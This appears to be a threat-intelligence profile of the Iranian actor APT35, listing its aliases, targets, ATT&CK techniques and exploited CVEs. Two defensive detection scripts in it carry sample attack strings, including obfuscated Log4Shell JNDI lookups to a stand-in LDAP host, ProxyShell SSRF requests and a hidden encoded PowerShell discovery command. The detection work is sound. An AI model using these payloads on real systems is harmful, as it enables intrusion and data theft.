Mallory
Origin: Iran 🇮🇷 (IR). 45 malware families. Exploits CVEs in the wild.

Magic Hound

Also known as: agent_serpens, APT35, Bohrium, calanque, charming_kitten, charming_kitten_apt, COBALT ILLUSION, cobalt_mirage, Crimson Sandstorm, Cuboid Sandstorm, CURIUM, DEV-0228, HOUSEBLEND, IMPERIAL KITTEN, ITG18, Magic Hound, Mint Sandstorm, newsbeef, Newscaster, Nimbus Manticore, Parastoo, phosphorous, phosphorus, Smoke Sandstorm, TA453, TA455, TA456, Tortoise Shell, Tortoiseshell, UNC1549, Yellow Liderc

APT35 is an Iranian state-linked threat actor that open-source reporting widely ties to the Islamic Revolutionary Guard Corps Intelligence Organization (IRGC IO). Reported aliases include Magic Hound, Charming Kitten, Phosphorus (also spelled Phosphorous), TA453, TA455, TA456, Mint Sandstorm, Crimson Sandstorm, Smoke Sandstorm, Agent Serpens, Cobalt Mirage, Cobalt Illusion, Imperial Kitten, ITG18, NewsBeef, Newscaster, Parastoo, Tortoiseshell, UNC1549, Nimbus Manticore, Bohrium, Calanque, Cuboid Sandstorm, Curium, DEV-0228, Houseblend, and Yellow Liderc, among others. These names come from different vendors and cover overlapping rather than identical activity clusters; the reporting summarised here, for example, distinguishes UNC1549/Nimbus Manticore tracking from the rest.

Reporting describes the actor as active since at least 2014 and focused on cyber espionage. Targeting includes individuals and organizations in the academic research, government, human rights, media, military, and technology sectors in Iran, the United States, Israel, and the United Kingdom; the energy, government, and technology sectors in Saudi Arabia; and, under UNC1549/Nimbus Manticore tracking, aerospace, aviation, and defense organizations across the Middle East, South Asia, and Western Europe. TA453 targeted senior medical researchers in the United States and Israel in late 2020, and in 2024 targeted a prominent Jewish religious figure using a fake podcast invitation.

Tradecraft cited in reporting includes credential phishing, social engineering, fake recruitment and career portals, spoofed institutional identities, malicious email attachments, multi-stage malware delivery, and HTTP for command and control. ATT&CK behaviour attributed to Magic Hound/Curium includes luring victims into opening malicious email attachments; exfiltrating data from compromised hosts; collecting the local IP address, MAC address, external IP address, and victim username; listing logical drives and directory contents; and deciding whether newly dropped files should execute in a hidden window.

Malware and tooling associated with the actor include BellaCiao, publicly attributed to Charming Kitten, and BellaCPP, assessed with medium-to-high confidence as associated with Charming Kitten; Drokbk, operated by a subgroup of Cobalt Mirage; BlackSmith and the AnvilEcho PowerShell trojan, used by TA453; and TOTPGuard, used in Nimbus Manticore recruitment-themed operations. Reporting also describes a late-2025 leak of internal APT35 documents that allegedly revealed a hierarchical, quota-driven espionage organization tied to the IRGC IO, with operations from May 2022 through October 2025 that included Exchange exploitation and data exfiltration against regional government, diplomatic, judicial, and infrastructure targets.
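The discovery and hidden-window behaviours above (local and external IP, MAC address, username, logical drives, hidden-window execution, PowerShell tooling such as AnvilEcho) are what a detection engineer looks for in process-creation telemetry. The script below is an added example, not code from this page or from any vendor report it summarises. It expands abbreviated powershell.exe switches (PowerShell accepts any unambiguous prefix, so -w, -win and -WindowStyle are the same switch), decodes -EncodedCommand payloads so the discovery checks run over the script that actually executes, recurses into the action of a schtasks /create, and maps what it finds to the ATT&CK IDs used in this profile. The command lines and the PowerShell snippet they carry are constructed samples; api.ipify.org stands in for whatever external-IP service a real sample would call.

```python
import base64
import binascii
import re

# powershell.exe accepts any unambiguous prefix of a parameter name (-w, -win, -WindowStyle all
# mean -WindowStyle). (canonical name, shortest usable prefix) for the parameters this check needs.
PS_PARAMS = [
    ("windowstyle", 1), ("encodedcommand", 1), ("executionpolicy", 2),
    ("noprofile", 3), ("noninteractive", 4), ("command", 1), ("file", 1),
]

# Discovery behaviours named in the profile, keyed by ATT&CK ID, matched on lower-cased text.
DISCOVERY_PATTERNS = {
    "T1016": re.compile(r"ipconfig|getmac|get-netipaddress|win32_networkadapterconfiguration"
                        r"|api\.ipify\.org|ifconfig\.me|icanhazip"),          # local/external IP, MAC
    "T1033": re.compile(r"\$env:username|whoami|\[environment\]::username"),  # victim username
    "T1083": re.compile(r"win32_logicaldisk|get-psdrive|driveinfo\]::getdrives|get-childitem"),  # drives, dirs
}


def tokenize(cmdline: str) -> list:
    """Split a command line on whitespace, keeping double-quoted arguments together."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', cmdline)]


def canonical_param(token: str):
    """Expand a (possibly abbreviated) PowerShell switch to its canonical name, else None."""
    if not token.startswith("-"):
        return None
    name = token[1:].lower()
    for canon, min_len in PS_PARAMS:
        if len(name) >= min_len and canon.startswith(name):
            return canon
    return None


def decode_encoded(b64: str):
    """-EncodedCommand payloads are base64 of UTF-16LE text; return None if this is not one."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def analyze(cmdline: str) -> list:
    """Return the sorted ATT&CK IDs matched by one process command line."""
    tokens = tokenize(cmdline)
    if not tokens:
        return []
    image = tokens[0].lower().rsplit("\\", 1)[-1]
    techniques = set()
    text = cmdline                      # text the discovery patterns run over (grows if we decode)
    if image.startswith(("powershell", "pwsh")):
        techniques.add("T1059.001")
        for i in range(1, len(tokens)):
            canon = canonical_param(tokens[i])
            value = tokens[i + 1] if i + 1 < len(tokens) else ""
            if canon == "windowstyle" and value.lower() in ("hidden", "1"):
                techniques.add("T1564.003")     # -WindowStyle Hidden (1 is the enum value)
            elif canon == "encodedcommand":
                techniques.add("T1027")         # base64-wrapped script
                decoded = decode_encoded(value)
                if decoded is not None:
                    text += " " + decoded       # inspect what actually runs, not the wrapper
    elif image.startswith("schtasks"):
        lowered = [t.lower() for t in tokens]
        if "/create" in lowered:
            techniques.add("T1053.005")
        if "/tr" in lowered and lowered.index("/tr") + 1 < len(tokens):
            techniques.update(analyze(tokens[lowered.index("/tr") + 1]))  # recurse into the task action
    lowered_text = text.lower()
    for technique_id, pattern in DISCOVERY_PATTERNS.items():
        if pattern.search(lowered_text):
            techniques.add(technique_id)
    return sorted(techniques)


# Constructed sample process-creation command lines (not taken from any real incident).
DISCOVERY_SCRIPT = ("$u=$env:USERNAME;$m=getmac /fo csv;"
                    "$d=(Get-WmiObject Win32_LogicalDisk).DeviceID;"
                    "$x=(Invoke-WebRequest -UseBasicParsing https://api.ipify.org).Content")
ENCODED = base64.b64encode(DISCOVERY_SCRIPT.encode("utf-16-le")).decode("ascii")
SAMPLE_EVENTS = [
    "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -nop -w hidden -e " + ENCODED,
    'schtasks.exe /create /sc minute /mo 15 /tn "Updater" /tr "powershell -w 1 -c whoami"',
    "powershell.exe -NoProfile -Command Get-Date",
    "cmd.exe /c whoami",
]

if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        print(analyze(event) or "-", "<=", event[:70])
```

The point of decoding rather than pattern-matching the wrapper is that the discovery commands only exist inside the UTF-16LE payload; a rule that keys on "-w hidden -e" alone would fire on the benign third sample's cousins and miss the content of the first. Extend DISCOVERY_PATTERNS with the specific cmdlets and hosts seen in your own telemetry.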


OPERATIONAL PROFILE

Targeting

Who, where, and (when attributed) which flag flies behind the operation. Pulled from open-source reporting and Mallory's analyst review.

Who they target

Sectors the actor has been observed targeting.

  • Commercial & Professional Services
  • Military

Where they're from

Attributed origin per open-source reporting.

  • IR
MITRE ATT&CK

Tradecraft

66 distinct techniques observed across reporting, grouped by tactic. The table below lists 90 technique entries across 14 of 15 tactics; a technique that serves several tactics (for example T1053 Scheduled Task/Job) is listed under each, so entries outnumber distinct techniques. A ×N suffix gives the number of intelligence reports citing that technique.
TA0043 Reconnaissance (2 techniques)
  • T1589 Gather Victim Identity Information
  • T1598 (×2) Phishing for Information
      • T1598.003 Spearphishing Link

TA0042 Resource Development (1 technique)
  • T1586 Compromise Accounts

TA0001 Initial Access (4 techniques)
  • T1078 Valid Accounts
      • T1078.004 Cloud Accounts
  • T1189 Drive-by Compromise
  • T1190 (×4) Exploit Public-Facing Application
  • T1566 Phishing
      • T1566.001 Spearphishing Attachment
      • T1566.002 (×3) Spearphishing Link
      • T1566.003 (×3) Spearphishing via Service

TA0002 Execution (5 techniques)
  • T1053 Scheduled Task/Job
      • T1053.005 Scheduled Task
  • T1059 (×2) Command and Scripting Interpreter
      • T1059.001 (×2) PowerShell
  • T1203 Exploitation for Client Execution
  • T1204 User Execution
      • T1204.002 (×3) Malicious File
  • T1574 (×2) Hijack Execution Flow
      • T1574.001 DLL

TA0003 Persistence (4 techniques)
  • T1053 Scheduled Task/Job
      • T1053.005 Scheduled Task
  • T1078 Valid Accounts
      • T1078.004 Cloud Accounts
  • T1505 Server Software Component
      • T1505.003 Web Shell
  • T1543 Create or Modify System Process
      • T1543.003 (×3) Windows Service

TA0004 Privilege Escalation (3 techniques)
  • T1053 Scheduled Task/Job
      • T1053.005 Scheduled Task
  • T1078 Valid Accounts
      • T1078.004 Cloud Accounts
  • T1543 Create or Modify System Process
      • T1543.003 (×3) Windows Service

TA0005 Defense Evasion (9 techniques)
  • T1027 (×5) Obfuscated Files or Information
      • T1027.003 Steganography
      • T1027.007 Dynamic API Resolution
  • T1036 (×3) Masquerading
  • T1078 Valid Accounts
      • T1078.004 Cloud Accounts
  • T1140 (×2) Deobfuscate/Decode Files or Information
  • T1497 Virtualization/Sandbox Evasion
      • T1497.001 System Checks
  • T1564 Hide Artifacts
      • T1564.003 Hidden Window
  • T1574 (×2) Hijack Execution Flow
      • T1574.001 DLL
  • T1620 Reflective Code Loading
  • T1622 Debugger Evasion

TA0112 Defense Impairment (1 technique)
  • T1553 Subvert Trust Controls
      • T1553.006 Code Signing Policy Modification

TA0006 Credential Access (4 techniques)
  • T1056 Input Capture
      • T1056.001 Keylogging
  • T1111 Multi-Factor Authentication Interception
  • T1539 Steal Web Session Cookie
  • T1621 Multi-Factor Authentication Request Generation

TA0007 Discovery (7 techniques)
  • T1016 System Network Configuration Discovery
  • T1033 System Owner/User Discovery
  • T1082 System Information Discovery
  • T1083 (×3) File and Directory Discovery
  • T1217 Browser Information Discovery
  • T1497 Virtualization/Sandbox Evasion
      • T1497.001 System Checks
  • T1622 Debugger Evasion

TA0008 Lateral Movement (1 technique)
  • T1021 Remote Services
      • T1021.004 SSH

TA0009 Collection (7 techniques)
  • T1005 Data from Local System
  • T1056 Input Capture
      • T1056.001 Keylogging
  • T1113 Screen Capture
  • T1114 Email Collection
      • T1114.002 Remote Email Collection
  • T1123 Audio Capture
  • T1213 Data from Information Repositories
  • T1560 Archive Collected Data

TA0011 Command and Control (6 techniques)
  • T1071 (×4) Application Layer Protocol
      • T1071.001 Web Protocols
      • T1071.004 DNS
  • T1102 Web Service
      • T1102.001 Dead Drop Resolver
  • T1105 (×3) Ingress Tool Transfer
  • T1219 Remote Access Tools
  • T1568 Dynamic Resolution
      • T1568.002 Domain Generation Algorithms
  • T1572 Protocol Tunneling

TA0010 Exfiltration (3 techniques)
  • T1041 (×5) Exfiltration Over C2 Channel
  • T1048 Exfiltration Over Alternative Protocol
  • T1567 Exfiltration Over Web Service
      • T1567.002 (×2) Exfiltration to Cloud Storage
WEAPONIZED

Associated vulnerabilities

18 CVEs this actor has used in observed campaigns, all of them exploited in the wild. The five with the most supporting reports are listed below, each with an evidence excerpt from the cited reporting.

CVE-2021-34473: ProxyShell pre-auth SSRF in Microsoft Exchange Autodiscover. Exploited in the wild. Evidence: 6 reports.

These campaigns leveraged vulnerabilities like ProxyShell to extract Global Address Lists (GALs), providing a systematic feed for further credential harvesting and long-term espionage.

CVE-2021-44228: Log4Shell (JNDI lookup RCE in Apache Log4j 2). Exploited in the wild. Evidence: 4 reports.

The February intrusion that Secureworks incident responders investigated began with a compromise of a VMware Horizon server using two Log4j vulnerabilities (CVE-2021-44228 and CVE-2021-45046).

CVE-2023-27350: Unauthenticated authentication bypass and RCE in PaperCut MF/NG. Exploited in the wild. Evidence: 3 reports.

Microsoft warns that Iran-linked APT groups have been observed exploiting the CVE-2023-27350 flaw in attacks against PaperCut MF/NG print management servers. The CVE-2023-27350 flaw is a PaperCut MF/NG Improper Access Control Vulnerability. PaperCut MF/NG contains an improper access control vulnerability within the SetupCompleted class that allows authentication bypass and code execution in the context of SYSTEM.

CVE-2021-31207: Post-auth arbitrary file write in Microsoft Exchange Server (ProxyShell chain). Exploited in the wild. Evidence: 2 reports.

FIN7 has compromised targeted organizations through exploitation of CVE-2021-31207 in Exchange. ... Magic Hound has exploited ... ProxyShell (CVE-2021-34473, CVE-2021-34523, CVE-2021-31207)

CVE-2024-1709: Authentication bypass in ConnectWise ScreenConnect. Exploited in the wild. Evidence: 2 reports.

APT35 , also known as Magic Hound, has confirmed active exploitation of ... ConnectWise ScreenConnect (CVE-2024-1709)

13 more CVEs tied to this actor tracked in Mallory.
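Four of the five CVEs above leave a recognisable request shape in web-server logs, which makes them cheap to hunt for retrospectively. The script below is an added example, not code from this page and not any vendor's signature. Over constructed access-log events it matches the ProxyShell Autodiscover SSRF (CVE-2021-34473), Log4Shell JNDI lookups including the nested-lookup and default-value obfuscation used to dodge naive `${jndi:` filters (CVE-2021-44228), the PaperCut SetupCompleted page (CVE-2023-27350) and the ScreenConnect SetupWizard.aspx/ trailing-slash path (CVE-2024-1709). In the ProxyShell chain CVE-2021-31207 is reached through the same Autodiscover SSRF, so the first check also covers that chain. The event tuple layout, hostnames and addresses are assumptions for the example.

```python
import re
from urllib.parse import unquote

# Constructed sample requests (not real logs): (method, request target, User-Agent).
SAMPLE_EVENTS = [
    # ProxyShell (CVE-2021-34473): Autodiscover SSRF reaching the PowerShell / NSPI back ends
    ("GET", "/autodiscover/autodiscover.json?@evil.test/powershell/?X-Rps-CAT=x"
            "&Email=autodiscover/autodiscover.json%3F@evil.test", "Mozilla/5.0"),
    ("GET", "/autodiscover/autodiscover.json?@evil.test/mapi/nspi/?"
            "&Email=autodiscover/autodiscover.json%3F@evil.test", "Mozilla/5.0"),
    # Log4Shell (CVE-2021-44228): JNDI lookup hidden behind nested lookups / default-value syntax
    ("GET", "/", "${${lower:j}${lower:n}di:ldap://203.0.113.9:1389/a}"),
    ("GET", "/", "${${::-j}ndi:rmi://203.0.113.9/x}"),
    # PaperCut (CVE-2023-27350): direct request to the SetupCompleted page
    ("GET", "/app?service=page/SetupCompleted", "curl/8.0"),
    # ScreenConnect (CVE-2024-1709): trailing slash after SetupWizard.aspx reopens the setup wizard
    ("GET", "/SetupWizard.aspx/", "python-requests/2.31"),
    # benign traffic
    ("GET", "/owa/", "Mozilla/5.0"),
    ("POST", "/autodiscover/autodiscover.xml", "Microsoft Office/16.0"),
]

_CASE_LOOKUP = re.compile(r"\$\{(?:lower|upper):([^${}]*)\}", re.IGNORECASE)  # ${lower:j} -> j
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")                       # ${env:X:-j} -> j

PROXYSHELL_BACKENDS = ("/powershell", "/mapi/nspi", "/ews/")


def normalize_log4j(text: str) -> str:
    """Collapse case and default-value lookups until nothing changes, then lower-case."""
    previous = None
    while previous != text:
        previous = text
        text = _CASE_LOOKUP.sub(lambda m: m.group(1), text)
        text = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), text)
    return text.lower()


def detect(method: str, target: str, user_agent: str) -> list:
    """Return the CVE IDs whose exploitation pattern this request matches."""
    decoded = unquote(unquote(target))          # two passes: payloads are often double-encoded
    low = decoded.lower()
    path = low.split("?", 1)[0]
    hits = []
    # ProxyShell: the Autodiscover path is abused to reach a back-end service, and Email= points
    # back at autodiscover.json itself (the "?@" trick). A normal Outlook Autodiscover request
    # carries a real mailbox in Email= and no back-end path, so it does not match.
    if ("autodiscover/autodiscover.json" in low
            and ("autodiscover.json?@" in low or "email=autodiscover/autodiscover.json" in low)
            and any(backend in low for backend in PROXYSHELL_BACKENDS)):
        hits.append("CVE-2021-34473")
    # Log4Shell: the lookup can sit in any logged field; scan target and User-Agent together.
    if "${jndi:" in normalize_log4j(decoded + " " + unquote(user_agent)):
        hits.append("CVE-2021-44228")
    # PaperCut: unauthenticated access to the SetupCompleted page.
    if path == "/app" and "service=page/setupcompleted" in low:
        hits.append("CVE-2023-27350")
    # ScreenConnect: anything after "SetupWizard.aspx/" bypasses the setup lock.
    if "/setupwizard.aspx/" in path:
        hits.append("CVE-2024-1709")
    return hits


def scan(events) -> dict:
    """Map CVE ID -> list of request targets that matched it."""
    findings = {}
    for method, target, user_agent in events:
        for cve in detect(method, target, user_agent):
            findings.setdefault(cve, []).append(target)
    return findings


if __name__ == "__main__":
    for cve, targets in sorted(scan(SAMPLE_EVENTS).items()):
        print(cve, len(targets), "hit(s)")
```

These are request-shape heuristics for hunting, not proof of compromise: a 200 on the ProxyShell or ScreenConnect path from an unpatched host is the signal worth chasing, and a 404 from a patched one is still worth noting as targeting. The Log4j normaliser only undoes the lookup forms shown; treat any surviving `${` in a request field as suspicious on its own.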

IOCS

Observables

385 indicators attributed to this actor (domains, IPs, hashes, and other artifacts pulled from reporting). Indicator values are gated behind the Mallory app and are not shown on this page.

ACTIVITY FEED

Recent activity

20 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
